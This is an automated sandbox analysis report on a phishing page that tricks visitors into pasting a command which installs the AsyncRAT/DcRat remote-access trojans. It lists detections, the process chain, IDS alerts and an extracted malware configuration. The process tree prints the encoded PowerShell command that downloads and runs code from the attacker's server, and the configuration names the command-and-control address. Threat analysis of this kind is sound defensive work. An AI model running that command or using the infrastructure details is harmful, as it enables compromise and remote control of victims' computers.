Windows
Analysis Report
https://myidverify.s3.us-east-1.amazonaws.com/redirect.html
Overview
General Information
Detection
AsyncRAT, DcRat
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
AI detected phishing page
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected DcRat
Compiles code for process injection (via .Net compiler)
Encrypted powershell cmdline option found
HTML page adds supicious text to clipboard
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Yara signature match
Classification
- System is w10x64
chrome.exe (PID: 6936 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized "abou t:blank" MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 940 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=1960,i ,123240697 8181910297 0,84727682 4341402600 3,262144 - -disable-f eatures=Op timization GuideModel Downloadin g,Optimiza tionHints, Optimizati onHintsFet ching,Opti mizationTa rgetPredic tion --var iations-se ed-version =20250306- 183004.429 000 --mojo -platform- channel-ha ndle=2004 /prefetch: 3 MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 6476 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= printing.m ojom.Unsan dboxedPrin tBackendHo st --lang= en-US --se rvice-sand box-type=n one --no-p re-read-ma in-dll --f ield-trial -handle=19 60,i,12324 0697818191 02970,8472 7682434140 26003,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction - -variation s-seed-ver sion=20250 306-183004 .429000 -- mojo-platf orm-channe l-handle=3 800 /prefe tch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 7308 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://myidv erify.s3.u s-east-1.a mazonaws.c om/redirec t.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
cmd.exe (PID: 8028 cmdline:
cmd /K cmd /c "power shell -e a QBlAHgAIAA oAGkAdwByA CAAIgBoAHQ AdABwADoAL wAvADkAMgA uADIANQA1A C4AOAA1AC4 AMgAvAGYAc gBlAHMAaAA uAGgAdABtA GwAIgApAC4 AQwBvAG4Ad ABlAG4AdAA =" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 8036 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 8080 cmdline:
cmd /c "po wershell - e aQBlAHgA IAAoAGkAdw ByACAAIgBo AHQAdABwAD oALwAvADkA MgAuADIANQ A1AC4AOAA1 AC4AMgAvAG YAcgBlAHMA aAAuAGgAdA BtAGwAIgAp AC4AQwBvAG 4AdABlAG4A dAA=" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 8096 cmdline:
powershell -e aQBlAH gAIAAoAGkA dwByACAAIg BoAHQAdABw ADoALwAvAD kAMgAuADIA NQA1AC4AOA A1AC4AMgAv AGYAcgBlAH MAaAAuAGgA dABtAGwAIg ApAC4AQwBv AG4AdABlAG 4AdAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) csc.exe (PID: 1816 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\y00ifih2 \y00ifih2. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) cvtres.exe (PID: 7480 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S3E6E.tmp" "c:\Users \user\AppD ata\Local\ Temp\y00if ih2\CSCF29 4E1DD95714 3A7ABBBA2A AFDECA1.TM P" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) MSBuild.exe (PID: 2340 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) MSBuild.exe (PID: 2484 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) MSBuild.exe (PID: 3148 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.AsyncRAT as delivered by MintsLoader includes a PowerShell module with a DGA. The DGA is similar to MintsLoader's DGA, but generates more domains and uses more than one TLD. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution |
{
"Server": "92.255.85.2",
"Port": "1414",
"Version": "LoaderPanel",
"MutexName": "wgzhwujraskz",
"Autorun": "false",
"Group": "Default",
"Certificate": "MIICMDCCAZmgAwIBAgIVAJHz+ah5/J2brULSjvSUc0iQ1oaHMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDExvYWRlciBQYW5lbDETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTI0MDYyMzE5MDc1MFoXDTM1MDQwMjE5MDc1MFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKp2yro0uvnyW5zSOLP7+UN5jwwmGf7etJxfEbnoT2kASrj94YBBkn5ouLu6RKIQdEIKQe0D91DnNGjgAxIQS7832z2B/XbNNpMTRAUaSR7x9YMAfdKatsQ1yrw8jL+aHkMa9z3s9ZJ61GHL3rQap2/qRA3MCgjOE1HDkVM6ayshAgMBAAGjMjAwMB0GA1UdDgQWBBR4VbOZRjY+OVaHv5BXbYQIjfZ7xjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH0z81fjHX24yLYTNwWHz+ksMjk2MtMs0roXCF1OjMdn9BSypbr2CQtHaOBvHi8Jd6GkOKaBVR/HHDCSwhyucirxMlvTRkOD4DPb4eEcY7R9uhbUjXUPRLv+8IVnawTyKKweTOCBKLttvyXQ2gXxmud7eyoUTre/TBECxlRahknH",
"ServerSignature": "BkiGqtc6q6M1kb0vxh6s+adeR1vdw2Q6PQBtJ6PIr8T0YWN8JbhC+k7hqUQXf52aDyzyASmRwL7zDj9+pg3LuEQiOW/7znu/xc3SM4PpqaTz2vr/GaGJUn7YYherkelSi23Cq4PUsIZqIcqI38D6rwq58aLAnL0wKrapNDek00Y="
}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
JoeSecurity_DcRat_2 | Yara detected DcRat | Joe Security | ||
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
Click to see the 8 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
rat_win_asyncrat | Detect AsyncRAT based on specific strings | Sekoia.io |
| |
rat_win_dcrat_qwqdanchun | Find DcRAT samples (qwqdanchun) based on specific strings | Sekoia.io |
| |
INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
|
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:24:46.247215+0200 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49762 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:25:01.329517+0200 | 2842478 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 1414 | 192.168.2.5 | 49764 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:24:43.052370+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49762 | 92.255.85.2 | 80 | TCP |
2025-04-17T13:24:46.247215+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49762 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:24:58.150167+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49763 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:25:01.329517+0200 | 2861128 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 1414 | 192.168.2.5 | 49764 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:25:01.329517+0200 | 2861127 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 1414 | 192.168.2.5 | 49764 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:24:43.052384+0200 | 1810003 | 2 | Potentially Bad Traffic | 92.255.85.2 | 80 | 192.168.2.5 | 49762 | TCP |
2025-04-17T13:24:46.247234+0200 | 1810003 | 2 | Potentially Bad Traffic | 92.255.85.2 | 80 | 192.168.2.5 | 49762 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-04-17T13:24:42.656958+0200 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49762 | 92.255.85.2 | 80 | TCP |
2025-04-17T13:24:58.150167+0200 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49763 | 92.255.85.2 | 80 | TCP |
- • AV Detection
- • Phishing
- • Compliance
- • Networking
- • Key, Mouse, Clipboard, Microphone and Screen Capturing
- • E-Banking Fraud
- • System Summary
- • Data Obfuscation
- • Persistence and Installation Behavior
- • Boot Survival
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Lowering of HIPS / PFW / Operating System Security Settings
- • Stealing of Sensitive Information
- • Remote Access Functionality
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Phishing |
---|
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |